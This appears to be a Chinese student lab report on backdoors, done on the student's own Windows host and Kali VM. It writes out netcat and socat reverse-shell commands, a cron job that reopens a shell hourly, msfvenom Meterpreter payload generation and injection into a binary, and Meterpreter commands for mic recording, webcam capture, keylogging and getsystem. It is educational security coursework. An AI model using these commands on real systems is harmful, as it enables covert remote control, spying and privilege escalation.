一、实验目标

1. 使用netcat获取主机操作Shell，cron启动
2. 使用socat获取主机操作Shell, 任务计划启动
3. 使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
4. 使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
5. 使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

二、问题回答

1. 例举你能想到的一个后门进入到你系统中的可能方式？

（1）下载来源不可靠的文件；
（2）访问受感染的网站或社交媒体链接；
（3）插入不明来源的U盘；
（4）在钓鱼网站上点击不安全的链接。

2. 例举你知道的后门如何启动起来(win及linux)的方式？

（1）在Windows系统中：利用windows启动项启动后门、利用windows服务启动后门、利用定时任务启动后门等；
（2）在Linux系统中：利用cron或at等定时任务工具启动后门、利用自启动脚本启动后门、利用利用SSH隧道启动后门、利用反弹Shell启动后门等。

3. Meterpreter有哪些给你映像深刻的功能？

能获得目标主机的shell、摄像头和麦克风权限、进行截屏并获得键盘记录等，能够窃取大量的隐私数据，网络防护工作真是任重道远。

4. 如何发现自己有系统有没有被安装后门？

（1）使用杀毒软件进行全盘杀毒扫描；
（2）使用cmd查看是否有可疑IP在进行外网链接；
（3）检查系统日志的系统和安全部分，检查是否有可疑程序。

三、实验过程

1．使用netcat获取主机操作Shell，cron启动某项任务

（1）查看主机的ip
首先关闭主机和虚拟机的防火墙，在windows主机上下载ncat程序，并打开cmd，输入ipconfig指令查看主机的IP地址：

（2）使用netcat进行连接并获取shell
虚拟机登入root用户（后续操作需要使用root权限），主机cmd进入ncat所在目录。
Win主机输入指令：ncat.exe -l -p 8888（l表示listen，“监听”；p表示port，指定端口，端口号可自行指定）
Linux虚机输入指令：nc 192.168.3.108 8888 -e /bin/sh（nc即netcat，后面的参数是要连接的ip和port，-e是指定连接后运行的程序，本例中就是shell。）

win主机输入ls，若能够正常显示虚拟机下文件名，证明主机已成功获取虚拟机shell。
（3）通过设置cron使得kali启动定时任务。
cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程。注意：windows不能直接使用crontab -e远程编辑，会报错；
我们这里进入虚拟机的虚拟机的root账户，输入crontab -e （执行文字编辑器来设定时程表），选择的是2：/usr/bin/vim.basic；

输入后进入文字编辑器，输入指令30 * * * * /bin/netcat 192.168.3.108 8888 -e /bin/sh （输入自己主机的IP地址，在每小时的第30分钟启动任务）

编辑好后退出文字编辑器，输入crontab -l查看时程表：

同时在Linux主机中的/var/spool/cron/crontabs文件中会出现一个root文件。

现在回到Windows主机的cmd中进行操作，还是一样与Linux建立连接之后，切换到root模式，输入:
echo "* * * * * echo "20222303" > /home/kali/2303_1.txt" > /var/spool/cron/crontabs/root（每分钟定时执行一次，用“20222303”覆盖文件2303_1.txt）
crontab -l （检查时程表）

进入Linux虚拟机进入对应路径检查2303_1.txt文件，发现修改成功。

2． 使用socat获取主机操作Shell，任务计划启动

Socat与netcat类似，但比起netcat，socat功能更多，比如如建立ssl连接。
windows主机：下载socat，cmd进入socat文件夹，输入命令：
socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr（把cmd.exe绑定到端口8888，并把cmd.exe的stderr重定向到stdout）
Linux虚拟机：进入root用户，输入命令：
socat - tcp:192.168.3.108:8888
回到主机，我们需要事先准备一个程序以供运行，在此省略程序编写环节

文件路径如下：

在Linux上启用Windows的程序，通过命令行创建任务计划，在shell里输入命令：
schtasks /create /sc minute /mo 1 /tn "20222303xpx" /tr C:\xpxshiyan2\xpx_2.exe（每一分钟执行一次我写的这个程序：）

回到windows主机，打开计算机管理，看到正在运行的任务名“20222303xpx”，说明实验成功。

3． 在Linux下使用MSF meterpreter生成可执行文件，利用ncat或socat传送到Windows主机并运行获取主机shell

保证windows的实时保护处于关闭状态，同时关闭防火墙进行实验。

（1）生成后门文件
首先在kali中输入ifconfig，获得虚拟机的IP地址：

虚拟机的IP地址是192.168.3.172
继续中输入以下命令：
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.172 LPORT=8888 -f exe > 2221backdoor.exe（使用msfvenom 工具生成一个反向 TCP Meterpreter shell 的 payload，并将其保存到一个可执行文件中。）
LHOST=192.168.3.172是shell 连接的主机 IP 地址，在本实验中是虚拟机的IP地址；
LPORT=8888是攻击者的系统上监听的端口号；
-f exe指定了生成的 payload 的格式，这里是exe；
2303backdoor.exe即生成的恶意可执行文件

（2）将后门文件传输至目标主机
主机进入ncat所在目录下，输入指令：
ncat.exe -lv 8888 > "C:\Users\Lenovo\Desktop\2303backdoor.exe"（监听8888窗口等待接收可执行文件2303backdoor.exe，并将2303backdoor.exe文件存放在桌面上）

虚拟机上输入指令：
nc 192.168.3.172 8888 < 2303backdoor.exe（将生成的后门文件2303backdoor.exe传给主机）

Win主机接收到后门文件2303backdoor.exe，成功在桌面找到文件

（3）配置监听模块
回到虚拟机，在Kali终端输入命令msfconsole，然后对监听模块进行配置：
use exploit/multi/handler（使用监听模块，设置payload）
set payload windows/meterpreter/reverse_tcp （使用和生成后门程序时相同的payload）
set LHOST 192.168.3.172 （攻击机的IP地址，和生成后门程序时指定的IP相同）
set LPORT 8888（监听的端口）

接着输入exploit，使监听模块开始运行，并在Windows终端运行后门2303backdoor.exe文件


返回检查虚拟机，输入ls查看windows主机目录，确认已经连接。

4．使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

（1）获取目标主机音频、截屏、摄像头、键盘记录
在exploit模块中继续输入以下命令：
record_mic　　 （音频）
screenshot　　 （截屏）
webcam_snap （拍照）
keyscan_start （开始读取键盘记录）
keyscan_dump （读取键盘记录结束）

音频截屏和拍照被保存在root文档中，键盘记录的字符串将直接显示在命令栏上




（2）提权
确保windows的cmd指令是使用管理员身份运行的，继续在exploit模块中继续输入：
getuid （查看当前用户）
getsystem （提权指令）

5．使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

在kali命令行下输入：
Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.175
LPORT=8888 -x /root/Desktop/pwn1 -f elf > 2303_pwn
（使用了msfvenom 工具生成一个 Meterpreter 反向 TCP shell的 payload，并将其注入到指定的可执行文件中，然后将结果输出到一个名为 2303_pwn的文件中。）

-p linux/x86/meterpreter/reverse_tcp：指定要生成的 payload 类型。
LHOST=192.168.3.175：目标主机 IP 地址为 192.168.3.175，这里即虚拟机IP地址。
LPORT=8888：设置 Meterpreter shell 使用的本地端口号为 8888。
-x /home/kali/Document/pwn1：指定一个可执行文件作为模板，生成的 payload 将会注入到该文件中。
-f elf：指定输出文件的格式为 ELF 格式，适用于 Linux 系统的可执行文件格式。
对生成的2221_pwn文件赋予权限,输入指令msfconsole，重现监听过程：

打开另一个shell，运行生成的2303_pwn文件（需要使用root权限）

回到第一个shell，输入ls确认连接，成功实现远程控制shell

四、实验中遇到的问题及解决

问题1：ncat连接正常建立但无法写入文件

解决方案：通过修改2303_1.txt文件权限及后缀名（原名为2303_1,修改后名为2303_1.txt）

问题2：socat实验中在Windows机cmd端schtasks /create /sc minute /mo 1 /tn "20222303xpx" /tr C:\xpxshiyan2\xpx_2.exe运行错误问题2：socat实验中在Windows机cmd端schtasks /create /sc minute /mo 1 /tn "20222303xpx" /tr C:\xpxshiyan2\xpx_2.exe运行错误

解决方案：格式错误，每个指令（如/create，/mo 1等）前都需要附带空格键。

问题3：MSF meterpreter生成后门文件不被windows主机识别，报错“此应用无法在你的电脑上运行”问题3：MSF meterpreter生成后门文件不被windows主机识别，报错“此应用无法在你的电脑上运行”

解决方案：修改msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=8888 -f exe > 2303backdoor.exe代码，加入字段“-a x86 --platform ”指x86的32位构架进行传输。同时，要在每一次电脑开机时重新关闭电脑的实时保护。

五、实验体会

在本次实验过程中，最让我痛苦的是问题三，生成的后门程序无法在主机上运行，并且在经历了网上搜集资料，和同学讨论等一系列过程后，仍然无法使问题得到解决。但好在我并没有放弃，在实验课上咨询了老师以后，又尝试了几种不同的思路，最后才偶然发现我的问题其实已经在不知不觉中解决了，但因为我并不清楚每次电脑重新开机都会自动打开实时保护，所以才一直使后门程序无法运行...这次实验也使我更深刻地意识到做事不能想当然，不能因为想着以前关过就不再关注防火墙，从而导致这次试验我浪费了大量时间和精力在这个问题上。
同时在本次实验中，我系统学习使用了ncat，socat和MSF meterpreter等工具，接触了控制shell和远程掌控主机的技巧，从而使我对于后门程序有了更深入的理解，能够从攻击方的角度思考，反推防范手段，增强了我对于后门程序的防范意识，也使我对网络攻防这门课程有了更浓厚的兴趣。总而言之，这次实验让我收获满满。